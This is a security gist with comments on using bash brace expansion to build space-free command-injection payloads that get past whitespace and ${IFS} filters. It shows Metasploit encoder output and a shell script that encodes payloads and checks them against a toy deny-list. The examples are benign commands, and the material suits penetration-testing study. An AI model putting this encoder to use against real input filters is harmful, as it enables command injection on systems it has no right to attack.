
@int0x80
Created January 12, 2021 17:32

This one blew my mind. An old trick applied in a new way: shell brace expansion. It simplifies payloads and filter bypass for command injection, because the payload needs no spaces and no ${IFS} to separate the command from its arguments; the shell rebuilds the argument list when it expands the braces.

$ file m.{exe,dll}
m.exe: PE32+ executable (console) x86-64, for MS Windows
m.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

$ {which,-a,curl}
/usr/bin/curl
/bin/curl

You have likely used shell brace expansion to run one command on multiple arguments, as with `file m.{exe,dll}` above. The trick is to include the command itself in the brace expansion: `{which,-a,curl}` expands to the three words `which`, `-a` and `curl` before the command is executed. Learned this the other night from @ippsec.

This is much cleaner than fuzzing character encoding or splitting the command with ${IFS}.

@wvu

wvu commented Jan 12, 2021

Using the Metasploit encoder:

wvu@kharak:~/rapid7/metasploit-framework:master$ echo -n "which -a curl" | ./msfvenom -p - -a cmd --platform unix -b " " -e cmd/brace
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/brace
cmd/brace succeeded with size 15 (iteration=0)
cmd/brace chosen with final size 15
Payload size: 15 bytes
{which,-a,curl}
wvu@kharak:~/rapid7/metasploit-framework:master$

@wvu

wvu commented Jan 12, 2021

Quick one-liner without Metasploit:

wvu@kharak:~$ echo "which -a curl" | echo "{$(tr -s " " ,)}"
{which,-a,curl}
wvu@kharak:~$

ETA: This doesn't escape , or handle [:space:].
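An added example, not code from the gist or from any of its commenters: a small encoder that turns an argv into one brace-expansion word the way the gist describes, and also covers the two gaps the one-liner above leaves open (commas and whitespace). Every character outside a conservative safe set is backslash-escaped so that commas, braces, `$`, quotes and other metacharacters survive brace expansion and the later quote removal as literals; a single-word command is emitted bare because `{ls}` alone would not expand. The deny-list in `passes_space_filter` is a constructed stand-in for a vulnerable sink that rejects whitespace and the string `IFS`; the function names are this example's own. Running the encoded payload through `bash -c` shows the original argv comes back intact, while an argument that itself contains a space is still caught by the filter, since an escaped space is still a space byte.

```shell
#!/bin/sh
# Added example: encode an argv as a single brace-expansion word, e.g.
#   brace_encode which -a curl   ->   {which,-a,curl}
# so the payload contains no spaces and no $IFS. Requires bash to expand
# the result (brace expansion is a bash feature, not POSIX sh).

# escape_word WORD: backslash-escape everything outside [A-Za-z0-9_./:=@%+-]
# so ',', '{', '}', '$', quotes, spaces and '\' survive brace expansion and
# quote removal as literal characters.
escape_word() {
    printf '%s' "$1" | sed 's|[^A-Za-z0-9_./:=@%+-]|\\&|g'
}

# brace_encode WORD...: print the brace-expansion form of the given argv.
# Caveat: empty arguments are not supported ({a,} would not round-trip).
brace_encode() {
    case $# in
        0) return 0 ;;
        1) escape_word "$1"; printf '\n'; return 0 ;;   # {word} alone does not expand
    esac
    be_out='{'
    be_sep=''
    for be_word in "$@"; do
        be_out="${be_out}${be_sep}$(escape_word "$be_word")"
        be_sep=','
    done
    printf '%s}\n' "$be_out"
}

# passes_space_filter PAYLOAD: toy deny-list (constructed for this example)
# standing in for a sink that rejects whitespace and the literal string IFS.
passes_space_filter() {
    case $1 in
        *[[:space:]]*|*IFS*) return 1 ;;
    esac
    return 0
}

# run_encoded WORD...: encode the argv, check the payload gets past the
# filter, then let bash expand it back into the original argv and run it.
run_encoded() {
    re_payload=$(brace_encode "$@") || return 1
    passes_space_filter "$re_payload" || { echo "blocked: $re_payload" >&2; return 1; }
    bash -c "$re_payload"
}

# Demonstration
brace_encode which -a curl                      # {which,-a,curl}
brace_encode printf '%s|' 'a,b' '$HOME' '{x}'   # {printf,%s\|,a\,b,\$HOME,\{x\}}
run_encoded  printf '%s|' 'a,b' '$HOME' '{x}'   # a,b|$HOME|{x}|
run_encoded  echo 'x y' || echo '(an argument containing a space is still blocked)'
```

The escaping is deliberately broad: brace expansion runs before parameter expansion, so an unescaped `$HOME` inside the braces would be expanded by the target shell, and an unescaped comma or brace would change how the braces are split. Arguments that themselves contain whitespace are the one thing this trick does not fix; they need a separate technique for the space inside the argument.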

@int0x80

int0x80 commented Jan 12, 2021

@wvu-r7 coming through! 🔥
